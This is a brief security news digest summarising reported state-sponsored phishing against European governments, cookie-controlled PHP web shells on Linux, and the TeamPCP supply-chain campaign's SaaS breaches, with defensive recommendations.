Originally reported by The Hacker News, SANS ISC
TL;DR
State-sponsored threat actors are escalating operations against European targets through sophisticated phishing campaigns and web shell persistence. The ongoing TeamPCP supply chain compromise has reached unprecedented scale with confirmed government breaches.
The TeamPCP supply chain campaign has compromised over 1,000 SaaS environments including the European Commission's cloud infrastructure, representing a critical threat to government and enterprise security.
The threat landscape this week showcases the persistent evolution of state-sponsored operations and supply chain compromises. From renewed Chinese government targeting to sophisticated persistence mechanisms and unprecedented SaaS breaches, defenders face multi-vector challenges requiring immediate attention.
Proofpoint researchers have identified renewed targeting of European government and diplomatic organizations by TA416, a China-aligned threat actor with multiple overlapping designations including DarkPeony, RedDelta, and Vertigo Panda. The campaign marks a significant shift after a two-year period of minimal European targeting activity.
The operation leverages PlugX malware alongside OAuth-based phishing techniques to compromise government networks. TA416's return to European targeting suggests strategic realignment in Chinese cyber operations, potentially coordinated with broader geopolitical objectives.
The threat actor's use of OAuth-based phishing represents an evolution in technique, exploiting legitimate authentication protocols to bypass traditional email security controls. Organizations should review OAuth application permissions and implement enhanced monitoring for suspicious authentication flows.
Microsoft Defender Security Research Team has documented a sophisticated web shell technique where threat actors use HTTP cookies as command and control channels on Linux servers. The approach represents a significant departure from traditional web shell implementations that rely on URL parameters or request bodies.
These PHP-based web shells achieve persistence through cron job scheduling, allowing attackers to maintain access even after initial compromise vectors are discovered. The cookie-controlled mechanism provides operational security benefits for threat actors by obscuring command execution within seemingly benign HTTP traffic.
The technique highlights the need for enhanced web application monitoring that includes cookie analysis and cron job auditing. Traditional web application firewalls may not detect these attacks without specific rules targeting cookie-based command channels.
SANS ISC's sixth intelligence update on the TeamPCP supply chain campaign reveals unprecedented scope, with Mandiant quantifying impact at over 1,000 SaaS environments. CERT-EU has confirmed the European Commission's cloud infrastructure as a verified victim, marking the campaign's expansion into critical government systems.
The campaign, dubbed "When the Security Scanner Became the Weapon," exploits compromised security scanning tools to establish persistent access across cloud environments. Recent developments include detailed post-compromise enumeration findings from Wiz and attribution of the axios package compromise to North Korean threat actors.
Sportradar has joined the growing list of confirmed victims, while LiteLLM has resumed operations following Mandiant's forensic audit. The scale and sophistication of the campaign underscore supply chain security as a critical vulnerability in modern cloud architectures.
Organizations should immediately audit their SaaS integrations, security scanning tool deployments, and third-party package dependencies. The campaign's impact on government infrastructure demands elevated threat modeling for cloud-first organizations.
Originally reported by The Hacker News, SANS ISC
